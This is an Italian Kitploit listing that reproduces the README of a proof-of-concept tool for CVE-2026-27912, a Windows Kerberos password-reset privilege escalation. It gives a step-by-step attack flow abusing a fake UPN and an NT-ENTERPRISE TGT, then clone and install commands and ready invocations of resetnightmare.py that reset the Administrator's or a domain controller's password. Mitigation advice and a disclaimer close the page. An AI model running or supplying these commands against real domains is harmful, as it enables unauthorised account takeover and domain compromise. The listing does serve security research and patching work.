Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Kerberos-CVE-2026-27912 — PoC per CVE-2026-27912 - Elevazione dei privilegi di Windows Kerberos (ResetNightmare). Reimpostazione della password non autorizzata tramite un difetto di Kerberos. Solo per ricerca sulla sicurezza. | Kitploit
Strumenti/GitHubGitHub/oxstussz-eng/kerberos-cve-2026-27912
Autenticazione e AutorizzazioneEscalation di PrivilegiAttacchi alle PasswordExploitPenetration Testing
GitHuboxstussz-eng/kerberos-cve-2026-27912

Kerberos-CVE-2026-27912

PoC per CVE-2026-27912 - Elevazione dei privilegi di Windows Kerberos (ResetNightmare). Reimpostazione della password non autorizzata tramite un difetto di Kerberos. Solo per ricerca sulla sicurezza.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
21128 giorni faNon ancora revisionato

Kerberos-CVE-2026-27912

CVE-2026-27912 - Vulnerabilità di elevazione dei privilegi in Windows Kerberos

ResetNightmare - Reimpostazione non autorizzata della password tramite un difetto del protocollo Kerberos Change Password.


📋 Dettagli

CampoValore
CVECVE-2026-27912
TitoloVulnerabilità di elevazione dei privilegi in Windows Kerberos
CVSS8.0 HIGH (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
CWECWE-285: Autorizzazione impropria
Pubblicazione14 aprile 2026
Patchaprile 2026

🔍 Flusso dell'attacco

root@kitploit:~
1. Attacker has/creates account with UPN write permissions
2. Sets fake UPN to target's sAMAccountName
3. Requests TGT with NT-ENTERPRISE name type
4. Clears their own UPN
5. Uses TGT to reset target's password
6. Verifies password change success

📦 Requisiti

  • Windows con PowerShell
  • Modulo ActiveDirectory (Install-WindowsFeature RSAT-AD-PowerShell)
  • Rubeus.exe (scaricabile da GhostPack/Rubeus)
  • Accesso di rete al Domain Controller

🚀 Installazione

root@kitploit:~
# Clone repository
git clone https://github.com/oxstussz-eng/Kerberos-CVE-2026-27912.git
cd Kerberos-CVE-2026-27912

# Install dependencies
pip install -r requirements.txt

💻 Utilizzo

Attacco di base

root@kitploit:~
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass

Account computer di destinazione

root@kitploit:~
python resetnightmare.py -t DC01$ -p NewPass123 -u AttackUser -up AttackPass -c

Creazione di un nuovo account

root@kitploit:~
python resetnightmare.py -t Admin -p NewPass -u NewUser -up Pass -path "OU=Temp,DC=domain,DC=local"

Modalità verbose

root@kitploit:~
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass -v

📊 Argomenti


🛡️ Mitigazione

  1. Applicare la patch ufficiale dell'aggiornamento di sicurezza Microsoft
  2. Segmentare la rete per limitare l'accesso alle reti adiacenti
  3. Applicare il principio del minimo privilegio - limitare i permessi di scrittura UPN
  4. Monitorare le modifiche UPN e le reimpostazioni di password sospette

⚠️ Disclaimer

Solo per test di sicurezza autorizzati e ricerca educativa.

L'accesso non autorizzato a sistemi informatici è illegale. L'autore non si assume alcuna responsabilità per l'uso improprio di questo software.


📚 Riferimenti

  • NVD: CVE-2026-27912
  • Guida agli aggiornamenti di sicurezza Microsoft

👨‍💻 Autore

n0vax1337 / Ricercatore di sicurezza


📄 Licenza

Licenza MIT - vedi LICENSE


Ultimo aggiornamento: 2026

Scarica lo strumento
FlagDescrizionePredefinito
-t / --targetNome dell'account di destinazioneobbligatorio
-p / --new-passwordNuova password per l'account di destinazioneobbligatorio
-u / --upn-userAccount su cui impostare il falso UPNobbligatorio
-up / --upn-passwordPassword per l'account UPNobbligatorio
-c / --computerUPNUser è un account computerflag
-r / --rubeus-pathPercorso di Rubeus.exeRubeus.exe
-e / --encryptionTipo di crittografia supportatoAES256
-path / --create-pathPercorso OU per creare il nuovo account""
-d / --dcNome del Domain Controllerrilevamento automatico
-v / --verboseOutput verboseflag